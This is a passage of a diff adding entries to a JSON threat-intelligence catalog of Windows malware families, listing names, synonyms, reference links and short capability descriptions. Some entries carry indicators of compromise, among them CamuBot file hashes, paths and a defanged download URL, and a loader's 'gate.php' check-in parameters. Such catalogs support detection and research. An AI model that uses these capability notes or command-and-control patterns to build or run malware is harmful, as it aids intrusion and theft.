"https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", + "value": "Azorult", + "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. 
It has been observed in conjunction with Chthonic as well as being dropped by Ramnit." + }, + { + "meta": { + "synonyms": [ + "SNOWBALL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", + "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "http://www.spiegel.de/media/media-35683.pdf", + "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/" + ] + }, + "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", + "value": "Babar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", + "value": "BABYMETAL", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", + "value": "backspace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", + "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", + "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", + "https://www.cert.pl/en/news/single/backswap-malware-analysis/" + ] + }, + "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", + "value": "BackSwap", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", + "https://twitter.com/PhysicalDrive0/status/833067081981710336" + ] + }, + "uuid": "af1c99be-e55a-473e-abed-726191e1da05", + "value": "BadEncript", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", + "value": "badflick", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", + "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + ] + }, + "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", + "value": "BadNews", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" + ] + }, + "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", + "value": "Bagle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + 
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ] + }, + "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", + "value": "Bahamut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", + "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" + ] + }, + "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", + "value": "Banatrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", + "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" + ] + }, + "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", + "value": "bangat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MultiBanker 2", + "BankPatch", + "BackPatcher" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", + "http://blog.kleissner.org/?p=69", + "http://osint.bambenekconsulting.com/feeds/", + "http://blog.kleissner.org/?p=192", + "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" + ] + }, + "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", + "value": "Banjori", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" + ] + }, + "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", + "value": "Bankshot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + ] + }, + "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", + "value": "Bart", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", + "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" + ] + }, + "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", + "value": "BatchWiper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" + ] + }, + "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", + "value": "Batel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" + ] + }, + "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", + "value": "BBSRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" + ] + }, + "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", + "value": "Bedep", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ] + }, + "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", + "value": "beendoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", + "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + ] + }, + "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41", + "value": "BernhardPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Neurevt" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", + 
"https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", + "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", + "http://www.xylibox.com/2015/04/betabot-retrospective.html", + "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", + "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" + ] + }, + "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", + "value": "BetaBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" + ] + }, + "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", + "value": "BfBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", + "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", + "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", + "https://habrahabr.ru/post/213973/" + ] + }, + "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", + "value": "BillGates", + "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources." 
+ }, + { + "meta": { + "synonyms": [ + "zxdosml" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", + "value": "Biscuit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + ] + }, + "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", + "value": "Bitsran", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bwin3_bka" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", + "https://www.evild3ad.com/405/bka-trojaner-ransomware/" + ] + }, + "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", + "value": "BKA Trojaner", + "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/" + ] + }, + "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", + "value": "BlackEnergy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "POSWDS", + "Reedum", + "Kaptoxa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + ] + }, + "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", + "value": "BlackPOS", + "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. 
" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", + "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" + ] + }, + "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", + "value": "BlackRevolution", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", + "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", + "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", + "value": "BlackShades", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + ] + }, + "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", + "value": "Boaxxe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" + ] + }, + "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", + "value": "Bohmini", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KBOT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", + "https://asert.arbornetworks.com/communications-bolek-trojan/", + "http://www.cert.pl/news/11379" + ] + }, + "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", + "value": "Bolek", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", + "value": "Bouncer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ] + }, + "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", + "value": "Bozok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", + "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + ] + }, + "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", + "value": "Brambul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "fbed27da-551d-4793-ba7e-128256326909", + "value": "BravoNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader", + "https://malpedia.caad.fkie.fraunhofer.de" + ] + }, + "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", + "value": "Breakthrough", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. 
C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/" + ] + }, + "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", + "value": "Bredolab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", + "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" + ] + }, + "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", + "value": "BrutPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", + "value": "BS2005", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", + "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" + ] + }, + "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", + "value": "BTCWare", + "description": "" + }, + { + "meta": { + "synonyms": 
[], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" + ] + }, + "uuid": "16794655-c0e2-4510-9169-f862df104045", + "value": "Bugat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ratopak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", + "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", + "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + ] + }, + "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", + "value": "Buhtrap", + "description": "" + }, + { + "meta": { + "synonyms": [ + "R2D2", + "0zapftis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", + "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf", + "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", + "https://www.f-secure.com/weblog/archives/00002249.html", + "https://www.f-secure.com/weblog/archives/00002249.html" + ] + }, + "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", + "value": "Bundestrojaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/", + "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/" + ] + }, + "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", + "value": "Bunitu", + "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. 
It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)." + }, + { + "meta": { + "synonyms": [ + "spyvoltar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", + "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" + ] + }, + "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", + "value": "Buterat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus" + ] + }, + "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", + "value": "Buzus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + ] + }, + "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", + "value": "BYEBY", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" + ] + }, + "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", + "value": "c0d0so0", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" + ] + }, + "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", + "value": "CabArt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cadelle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + ] + }, + "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", + "value": "CadelSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", + "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" + ] + }, + "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", + "value": "CamuBot", + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", + "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" + ] + }, + "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", + "value": "Cannibal Rat", + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." 
+ }, + { + "meta": { + "synonyms": [ + "Anunak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + ] + }, + "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", + "value": "Carbanak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + ] + }, + "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", + "value": "Carberp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", + "value": "Cardinal RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", + "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" + ] + }, + "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", + "value": "Casper", + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", + "value": "Catchamas", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", + "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", + "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://blog.avast.com/progress-on-ccleaner-investigation", + "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "https://twitter.com/craiu/status/910148928796061696", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", + "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", + "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + ] + }, + "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", + "value": "CCleaner Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cerebrus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", + 
"https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" + ] + }, + "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", + "value": "CenterPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" + ] + }, + "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", + "value": "Cerber", + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" + ] + }, + "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", + "value": "Cerbu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ham Backdoor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ] + }, + "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", + "value": "ChChes", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cherrypickerpos", + "cherrypicker", + "cherry_picker" + ], + "type": [], + "refs": [ + 